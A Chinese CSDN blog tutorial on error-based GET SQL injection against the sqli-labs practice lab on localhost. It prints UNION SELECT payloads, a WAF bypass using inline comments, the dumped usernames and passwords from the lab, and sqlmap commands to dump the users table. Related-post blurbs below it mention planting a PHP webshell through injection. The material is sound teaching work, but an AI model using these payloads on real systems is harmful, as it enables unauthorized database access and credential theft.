GET基于报错的SQL注入

最新推荐文章于 2024-07-17 12:32:24 发布
最新推荐文章于 2024-07-17 12:32:24 发布
阅读量646 收藏
点赞数
分类专栏: 学习归纳 文章标签: SQL注入 GET基于报错 渗透 sqlmap 手工注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43571641/article/details/104261437
版权

在这里插入图片描述

当前用户:select user();
所有数据库:show databases;
当前数据库:select database();
当前版本:select version();

mysql常用注释符:#或–空格或/**/ 空格也就是%20
内联注释:/!SQL语句/只有MySQL可以识别,常用来绕过WAF

select * from articles where id=id

使用内联注释注入:

select * from articles where id=-1 /*!union*//*!select*/ 1,2,3,4

根据注入位置数据类型可将SQL注入分为两类:数字型和字符型

GET基于报错的SQL注入:实验靶场:sqli-labs less1~4在这里插入图片描述提示:报错默认加了单引号,去掉单引号,才是真正SQL语句的报错

less1:

输入:?id=14'
报错:''14'' LIMIT 0,1'
猜测:select login_name,password from admin where id = 'id' limit 0,1
解决:?id=14' --+

less2:

输入:?id=14'
报错:  '' LIMIT 0,1'
猜测:select login_name,password from admin where id = id limit 0,1
解决:/?id=14  --+'

less3:

输入:?id=14'
报错: ''14'') LIMIT 0,1'
猜测:select login_name,password from admin where id = ('id') limit 0,1
解决:?id=14') --+

less4:

输入:?id=14“
报错:'"14"") LIMIT 0,1'
猜测:select login_name,password from admin where id = ("id") limit 0,1
解决:?id=14") --+

GET基于报错的SQL注入利用:

  1. 利用order by 判断字段数
  2. 利用union select 联合查询,获取表名
?id=0’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
  1. 利用union select 联合查询,获取字段名
?id=0’ union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+
  1. 利用union select 联合查询,获取字段值
?id=0' union select 1,group_concat(username,password),3 from users --+

例子less 1 详解:

输入:?id=1' order by 3 --+
输出:正常
再输入 :?id=1' order by 4 --+
输出:报错 
由此推断为3列

再输入:?id=0' union select 1,user(),database()  --+
输出:Your Login name:root@localhost
     Your Password:security
由此得到当前mysql用户和当前数据库名,也可version()得到数据库版本

再输入:?id=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
输出:Your Login name:emails,referers,uagents,users
     Your Password:3
由此得到所有的表名

再输入:?id=0' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+
输出:Your Login name:user_id,first_name,last_name,user,password,avatar,last_login,failed_login,id,user,pass,ip,login_time,status,ppp,id,username,password,sex,work,phone,id,username,password,id,user,pass,ip,login_time,status,ppp 
     Your Password:3
由此得到users表的所有字段名

再输入:?id=0' union select 1,group_concat(username,0x3a,password),3 from users --+
输出:Your Login name:Dumb:Dumb,Angelina:I-kill-you,Dummy:p@ssword,secure:crappy,stupid:stupidity,superman:genious,batman:mob!le,admin:admin,admin1:admin1,admin2:admin2,admin3:admin3,dhakkan:dumbo,admin4:admin4
     Your Password:3
由此得到users表中username和password字段的所有值

sqlmap安全测试:–batch:表示默认操作

爆数据库:
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --dbs --batch
爆表名:
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" -D security --tables --batch
爆字段:
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" -D security -T users --columns --batch
爆字段值:
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" -D security -T users -C username,password --dump --batch
Luckysec
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
22-2 GET基于报错sql注入利用-脱库
weixin_43263566的博客
01-24 268
因为在上一篇文章已经找出sql注入靶场前四关的注入点与闭合符,下面的操作我们基于这个基础上实现。
22-1.1 SQL注入的类型之GET基于报错SQL注入回显分析
weixin_43263566的博客
01-22 116
这个实验环境来学习基于报错SQL注入。按照实验指导,在URL中修改ID参数值,并观察页面的回显情况。尝试上述探测方法,同时学习如何使用工具(如SQLmap)来辅助注入攻击。我们可以通过修改URL中的ID参数值来探测是否存在注入漏洞。
SQL报错注入
qq_64332865的博客
02-18 605
基于报错注入,是指通过构造特定的SQL语句,让攻击者想要查询的信息(如数据库名、版本号、用户名等)通过页面的错误提示回显出来。 报错注入一般需要具备两个前提条件:(1)Web应用程序未关闭数据库报错函数,对于一些SQL语句的错误直接回显在页面上;(2)后台未对一些具有报错功能的函数进行过滤。 常用的报错功能函数包括extractvalue()、 updatexml)、floor()、exp()等。 关于floor()函数,在进行报错注入时,floor()函数一般需要与rand()、count()、g
渗透测试工具sqlmap基础教程
最新发布
分享编程技术、项目开发、实用工具。
07-17 25万+
转载请注明出处:http://blog.csdn.net/zgyulongfei/article/details/41017493 本文仅献给想学习渗透测试的sqlmap小白,大牛请绕过。 > > 对于网络安全人员来说,掌握渗透工具的使用方法是一项必备的技能。然而,一个没有师傅带领的小白在刚开始学习时,并不知道该如何入手进行渗透学习,所以本文旨在帮助这些小白入门。 sqlmap
GET报错注入
qq_43776408的博客
06-09 654
报错介绍 使用的正常的语句无法显示想要查询的数据,然后我们故意输入错的语句来强迫数据库 爆出数据来 GET单引号报错注入 以less-5为例 原sql语句 select * from admin where id=‘id’ limit 0,1 回顾一下 浏览器输入id=1正确 显示you are in 在输入id=1 显示错误 you have an error in "1’ LIMIT 0,1’ 去掉外引号 ‘1’ LIMIT 0,1 你想啊,输入1是对的 但是输入1\是错的 所以就是多出了一个\
基于报错sql注入
qq_44111753的博客
11-21 302
MYSQL中默认有个information schema数据库,用来存储数据库元信息。其中具有表schemata(数据库名)、tables(表名)、 columns(列名或字段名)。 schemata:schema_ name字段用来存储数据库名。 tables:table_ schema和table_ name分别用来存储数据库名和表名。 columns:table_schema(数据库名)、table_name(表名)、column name(字段名) 1、发现SQL注入 根据报错信息'1'' LIM
SQL | GET报错注入
m_de_g的博客
12-05 824
SQL | GET报错注入 1.报错注入介绍 2.GET单引号报错注入 3.GET双引号报错注入 4.Sqlmap安全测试
GET基于报错SQL注入漏洞详解
LoveStarbucks的博客
12-26 1100
GET基于报错SQL注入漏洞详解 开始前的补充知识: mysql中比较常用的一些函数: version():查询数据库的版本 user():查询数据库的使用者 database():数据库 system_user():系统用户名 session_user():连接数据库的用户名 current_user:当前用户名 load_file():读取本地文件 @@datadir:读取数据库路径 @@b...
第四节 基于报错SQL注入-01
09-15
GET基于报错SQL注入利用是指利用SQL注入漏洞来获取敏感数据或控制服务器。下面是一些常见的利用方法: 1. 利用order by 判断字段数:使用order by语句来判断表中的字段数,例如:`0' order by 3 --+`。 2. 利用...
22-2.1 get基于报错sql注入利用-读敏感文件和写入一句话木马
weixin_43263566的博客
01-25 251
通过这个查询语句,攻击者尝试将一段包含恶意PHP代码的字符串写入到一个指定的文件中,从而创建一个后门(backdoor)程序,可以让攻击者对受害者的服务器进行远程控制和操作。这是一个恶意的SQL注入攻击,它使用UNION注入的方式向数据库中插入一段包含恶意PHP代码的字符串,并将其存储到指定的文件中。因为我也不知道靶场的敏感文件是哪个,所以我就读取我们刚才注入的木马文件。判断MysQL的存储路径方便我们写入一句话马。双击刚才创建的连接就能进入目标的文件管理界面。在现实的情况下这种注入手段成功率很低。
SQL注入:基于报错SQL注入
weixin_73180072的博客
12-04 297
基于报错SQL注入
SQL注入—基于报错注入
Snowflake1997的博客
02-18 1122
问SQLi-Labs网站 在攻击机Pentest-Atk打开FireFox浏览器,并访问靶机A-SQLi-Labs上的SQLi-Labs网站Less-2。访问的URL为: http://[靶机IP]/sqli-labs/Less-1/ 登录后,根据网页提示,给定一个GET参数,即: http://[靶机IP]/sqli-labs/Less-1/?id=1 此时页面显示id=1的用户名Dump、密码Dump。 以此来检验浏览器是否安装Hackbar插件,界面F9按键是启用或停用。 寻找.
SQL注入-基于报错注入
xdjxi的博客
02-18 579
实验目的 熟悉报错功能函数extractvalue()的用法,掌握基于报错SQL注入基本流程 实验步骤 本实验的目标是:以SQLi-Labs网站的Less-1为入口,借助extractvalue()函数,利用基于报错注入方式获取SQLi-Labs网站用户名和密码 1 访问SQLi-Labs网站 http://(靶机ip)/sql/Less-1/?id=1 2 寻找注入点 使用3条payload寻找注入点及判断注入点的类型 http://靶机ip/sql/Less-1/?id=1'运..
SQL注入之基于报错注入
weixin_68951704的博客
07-05 1037
目录1.GET单引号字符型2.GET数字型3.GET单引号加括号字符型4.GET双引号字符型5.注入利用5.1利用order by判断字段5.2利用联合查询查找信息首先我们打开搭建好的sqli-labs靶场,选择less-1 进入后我们看到这样一行提示 请输入一个id值作为对应参数,这里我输入1作为参数,验证后1-14均可以回显 输入后login name 和password都显现出来我们输入单引号这里显示错误,我们将错误回显记录下来 由此我们可以猜解出SQL语句为select login_name,
get基于报错sql注入
冷巷(✘_✘)的博客
07-14 1090
目录1.SQL注入的分类数字型字符型2.get基于报错sql注入发现3.get基于报错sql注入利用1.利用order by 判断字段数。2.利用union select 联合查询,获取表名。3.利用union select联合查询,获取字段名。4.利用union select 联合查询,获取字段值。4.利用sqlmap测试根据注入为数据类型可将sql注入分为数字型和字符型。例如 字符型 例如 2.get基于报错sql注入发现 通过在url中修改对应的id值,为正常数字、打数字、字符(单引
sql注入报错注入
2302_79119987的博客
04-19 1480
实行注入的地方。
SQL注入——基于报错注入(2)
qq_52072846的博客
02-18 832
实验目的 熟悉报错功能函数floor()的用法,掌握基于报错SQL注入基本流程。 实验原理 (1)关于报错注入 基于报错注入,是指通过构造特定的SQL语句,让攻击者想要查询的信息(如数据库名、版本号、用户名等)通过页面的错误提示回显出来。 报错注入一般需要具备两个前提条件:(1) Web应用程序未关闭数据库报错函数,对于一些SQL语句的错误直接回显在页面上;(2)后台未对一些具有报错功能的函数进行过滤。 常用的报错功能函数包括extractvalue()、updatexml()、floor()、ex
sql注入报错注入
笔墨稠思
07-07 168
本次注入采用DVWA靶场,靶场等级Low,数据库mysql 基于报错注入 利用mysql自身函数的漏洞来获取数据 例如 select * from 表 where id = 1 and (extractvalue(1,concat(0x7e,(select user()),0x7e))); select * from 表 where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1)); 0x7e 是字符~ 的ascii 码的十六进制表
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Luckysec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值